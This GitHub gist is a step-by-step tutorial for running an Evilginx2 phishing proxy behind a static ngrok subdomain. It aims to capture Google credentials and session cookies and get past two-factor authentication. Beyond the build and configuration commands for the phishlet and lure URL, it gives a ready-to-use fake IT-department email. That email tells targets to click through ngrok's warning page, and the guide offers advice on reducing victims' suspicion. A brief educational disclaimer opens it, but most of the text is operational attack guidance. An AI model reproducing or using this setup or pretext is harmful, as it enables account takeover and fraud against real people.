Skip to content

Instantly share code, notes, and snippets.

@iklobato

iklobato/ngrok_evilginx_local.md

Last active June 9, 2025 19:52
Show Gist options
  • Save iklobato/15c1323ad7adf766b3f15bc29a958887 to your computer and use it in GitHub Desktop.
Save iklobato/15c1323ad7adf766b3f15bc29a958887 to your computer and use it in GitHub Desktop.
Download ZIP
Creating a local evilginx instance that works with ngrok tunnel
Raw
ngrok_evilginx_local.md

The Ultimate Guide to Evilginx and Ngrok: Local Setup & Strategy (2025)

This comprehensive tutorial provides a complete walkthrough for setting up Evilginx with ngrok locally. Learn the core technical steps and, more importantly, the advanced strategies for making your attack effective without needing a custom domain. This guide covers getting a static ngrok URL, crafting compelling social engineering pretexts, bypassing 2FA on services like Gmail, and ensuring a flawless user experience. Perfect for students of ethical hacking, penetration testers, and cybersecurity researchers.

⚠️ Ethical Use & Cybersecurity Disclaimer

This guide is published for educational and research purposes only. The information contained within details the creation of a phishing environment to help security professionals understand and defend against modern man-in-the-middle (MitM) attacks. Unauthorized use of these techniques to target individuals or organizations is illegal. Always obtain explicit, written consent before conducting any penetration test.

Part 1: Core Technical Setup

This section covers the foundational installation and configuration of the tools.

Required Tools for This Tutorial

  • Go (Golang): Required to compile the Evilginx2 source code.
  • Evilginx2: The open-source MitM framework.
  • Ngrok: A free or paid account is needed. A free account is sufficient to follow this guide.

Step 1: How to Install and Configure Evilginx2

First, we get the Evilginx framework compiled and running.

  1. Download from GitHub:

    git clone https://github.com/kgretzky/evilginx2.git
    • Explanation: Downloads the complete Evilginx2 source code from its official repository.

  2. Compile the Program:

    cd evilginx2
go build
    • Explanation: Compiles the source into a single evilginx2 executable file.

  3. Initial Run with Admin Rights:

    sudo ./evilginx2
    • Explanation: Running with sudo is required for Evilginx to listen on privileged network ports (80/443). This first run creates the necessary configuration files.

Step 2: Understanding the Phishlet Configuration

A "phishlet" is a YAML file that tells Evilginx how to proxy a specific website (e.g., Gmail). A correct configuration is key.

  • Location: Find the google.yaml file in the phishlets directory.
  • Function: This file contains all the rules for how to handle Google's login domains, how to rewrite links on the page to point back to your proxy, and where to look for credentials and session cookies. A deep understanding of this file is essential for advanced attacks.

Part 2: The 'No Domain' Strategy for Maximum Success

This is the most critical part of the guide for anyone not using a paid, custom domain. These steps transform your attack from amateurish to highly credible.

Improvement 1: Get a Free Static Ngrok URL (Crucial Step)

Instead of using a random ngrok URL that changes every time, you will claim a permanent, professional-looking subdomain for free.

Why this is a game-changer:

  • Random URL (Bad): https://3b1e-189-12-45-78.ngrok-free.app
  • Static URL (Good): https://acme-secure-portal.ngrok-free.app

How to set up your free static domain:

  1. Log in to your ngrok Dashboard.
  2. On the left menu, navigate to Cloud Edge -> Domains.
  3. Click "+ Create Domain". You can now claim a free *.ngrok-free.app subdomain.
  4. Enter your desired name (e.g., secure-document-portal, corporate-sso-login) and save it.
  5. You will now use this static domain when you launch ngrok.

Improvement 2: Master the Social Engineering Pretext

With your improved URL, you need a story that explains away the two remaining red flags: the ngrok-free.app domain and the browser warning page. You must proactively frame them as security features.

Template: The "IT Department / System Upgrade" Pretext

Subject: Action Required: Re-authenticate to the New Secure Access Gateway

Hello Team,

As part of our ongoing security enhancements, the IT Department is migrating all staff to a new Secure Access Gateway powered by our network partner, Ngrok.

Please use the link below to re-authenticate your account credentials.

Link: https://your-static-domain.ngrok-free.app

Note: For your protection, you will be taken to an Ngrok security portal first. Please click the blue "Visit Site" button to proceed to the standard Google login page. This is a normal part of the new verification process.

Thank you, IT Services

Improvement 3: Ensure a Flawless Post-Click Experience

Because the entry point to your attack (the URL and warning page) contains unusual elements, the destination must be pixel-perfect.

  • Test Your Phishlet: Before sending the link, go through the entire process yourself. Does the proxied Google page look and function exactly like the real one?
  • Check for Broken Elements: Any broken images or formatting issues are immediate red flags that will alert a savvy user.

Part 3: Launching the Attack

Now we combine our strategy with the final technical execution.

Step 3: Launch Ngrok with Your Static Domain

Launch the ngrok tunnel using the static domain you created in Part 2.

# This command replaces the old "ngrok http 443" command
ngrok http 443 --domain your-chosen-static-subdomain.ngrok-free.app

Step 4: Integrate Evilginx with Your New Static URL

Configure Evilginx to use your permanent, credible ngrok URL.

  1. Configure Evilginx Settings: Inside the Evilginx terminal, input the following commands: 
    config domain your-chosen-static-subdomain.ngrok-free.app
config ip 127.0.0.1
  2. Assign Hostname to Phishlet: 
    phishlets hostname google your-chosen-static-subdomain.ngrok-free.app

Step 5: Deploy the Lure and Capture Data

  1. Enable the Phishlet:

    phishlets enable google
    • Explanation: This activates the Google phishing proxy. Evilginx is now live and listening for connections on your ngrok URL.

  2. Generate the Phishing Lure URL:

    lures create google
lures get-url 0
    • Explanation: This retrieves the specific URL for your campaign. This is the link you will embed in the social engineering email you crafted.

  3. Capture Credentials and Bypass 2FA: When the target follows your instructions, clicks through the warning page, and logs in, Evilginx will capture their credentials and session cookies in real-time, successfully bypassing 2FA.

## Frequently Asked Questions (FAQ)

  • Q1: Is this setup completely undetectable?

    • A: No. A savvy user may still be suspicious of the ngrok-free.app URL. The goal of this strategy is to lower suspicion enough to be effective. For professional engagements, a real custom domain purchased and configured with Evilginx on a VPS is the standard.

  • Q2: Is a static ngrok domain safer than a random one?

    • A: From a security perspective, they are the same. From a psychological and credibility perspective, the static domain is vastly superior and critical for this strategy's success.

  • Q3: Can this setup really bypass modern 2FA?

    • A: Yes. It demonstrates a classic session hijacking attack. By sitting in the middle, it waits for the user to complete all authentication steps (including 2FA) and then steals the resulting session cookie. It doesn't break the 2FA algorithm itself, but it effectively makes it irrelevant by stealing the authenticated session.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment